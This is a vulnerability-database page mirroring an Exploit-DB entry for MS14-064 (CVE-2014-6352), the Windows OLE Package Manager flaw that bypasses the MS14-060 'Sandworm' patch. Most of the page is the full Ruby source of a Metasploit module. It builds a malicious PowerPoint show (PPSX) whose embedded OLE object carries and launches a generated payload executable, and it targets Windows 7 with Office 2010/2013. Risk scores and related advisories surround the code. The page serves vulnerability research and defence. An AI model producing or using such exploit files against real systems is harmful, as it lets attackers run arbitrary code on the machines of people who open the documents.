Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)

🗓️ 14 Nov 2014 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 122 Views

Microsoft Windows OLE Package Manager Code Execution. Exploits Windows OLE allowing arbitrary code execution, bypasses MS14-060 patch, affects Windows Vista SP2 through Windows 8, Windows Server 2008, and 2012. Notably affects Office 2013 and Office 2010 SP2. Stable on Windows 7 SP1 / Office 2010 SP2 / Office 2013

Related
Code
ReporterTitlePublishedViews
Family
0day.today		MS Office 2007 and 2010 - OLE Arbitrary Command Execution Exploit
12 Nov 201400:00
zdt
0day.today		MS14-064 Microsoft Windows OLE Package Manager Code Execution Exploit
16 Nov 201400:00
zdt
ATTACKERKB		Microsoft Internet Explorer Use-After-Free Vulnerability
15 Oct 201400:00
attackerkb
ATTACKERKB		CVE-2014-6352
22 Oct 201400:00
attackerkb
BDU FSTEC		Vulnerability of Windows operating systems, related to errors in code generation, allows a hacker to execute arbitrary code.
13 Oct 202100:00
bdu_fstec
Circl		CVE-2014-6352
20 Oct 201400:00
circl
CISA KEV Catalog		Microsoft Windows Code Injection Vulnerability
25 Feb 202200:00
cisa_kev
CISA		Microsoft Releases Advisory for Unpatched Windows Vulnerability
22 Oct 201400:00
cisa
CISA		CISA Adds Four Known Exploited Vulnerabilities to Catalog
25 Feb 202200:00
cisa
Check Point Advisories		Microsoft Windows OLE Remote Code Execution (MS14-060; CVE-2014-4114; CVE-2014-6352)
14 Oct 201400:00
checkpoint_advisories
Rows per page
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
        allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
        The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
        such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
        to be vulnerable. However, based on our testing, the most reliable setup is on Windows
        platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other
        setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a
        crash due to a failure in the CPackage::CreateTempFileName function.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Haifei Li', # Vulnerability discovery
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-6352'],
          ['MSB', 'MS14-064'],
          ['BID', '70690'],
          ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous']
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 21 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
      ], self.class)
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    ole_stream = ole_packager
    zip = zip_ppsx(ole_stream)
    file_create(zip)
  end

  def zip_ppsx(ole_stream)
    zip_data = {}
    data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-6352', 'template_run_as_admin')

    Dir["#{data_dir}/**/**"].each do |file|
      unless File.directory?(file)
        zip_data[file.sub(data_dir,'')] = File.read(file)
      end
    end

    # add the otherwise skipped "hidden" file
    file = "#{data_dir}/_rels/.rels"
    zip_data[file.sub(data_dir,'')] = File.read(file)

    # put our own OLE streams
    zip_data['/ppt/embeddings/oleObject1.bin'] = ole_stream

    # create the ppsx
    ppsx = Rex::Zip::Archive.new
    zip_data.each_pair do |k,v|
      ppsx.add_file(k,v)
    end

    ppsx.pack
  end

  def ole_packager
    payload_name = "#{rand_text_alpha(4)}.exe"

    file_info = [2].pack('v')
    file_info << "#{payload_name}\x00"
    file_info << "#{payload_name}\x00"
    file_info << "\x00\x00"

    extract_info = [3].pack('v')
    extract_info << [payload_name.length + 1].pack('V')
    extract_info << "#{payload_name}\x00"

    p = generate_payload_exe
    file = [p.length].pack('V')
    file << p

    append_info = [payload_name.length].pack('V')
    append_info << Rex::Text.to_unicode(payload_name)
    append_info << [payload_name.length].pack('V')
    append_info << Rex::Text.to_unicode(payload_name)
    append_info << [payload_name.length].pack('V')
    append_info << Rex::Text.to_unicode(payload_name)

    ole_data = file_info + extract_info + file + append_info
    ole_contents = [ole_data.length].pack('V') + ole_data

    ole = create_ole("\x01OLE10Native", ole_contents)

    ole
  end

  def create_ole(stream_name, data)
    ole_tmp = Rex::Quickfile.new('ole')
    stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)

    stm = stg.create_stream(stream_name)
    stm << data
    stm.close

    directory = stg.instance_variable_get(:@directory)
    directory.each_entry do |entry|
      if entry.instance_variable_get(:@_ab) == 'Root Entry'
        # 0003000C-0000-0000-c000-000000000046 # Packager
        clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
        entry.instance_variable_set(:@_clsId, clsid)
      end
    end

    # write to disk
    stg.close

    ole_contents = File.read(ole_tmp.path)
    ole_tmp.close
    ole_tmp.unlink

    ole_contents
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Nov 2014 00:00Current
8High risk
Vulners AI Score8
CVSS 3.17.8
CVSS 29.3
EPSS0.90729
SSVC
microsoftwindowsolecode executionms14-064sandwormvulnerabilitymetasploitcve-2014-6352bypassoffice 2010 sp2office 2013windows vistawindows 8windows server 2008windows server 2012windows 7 sp1
122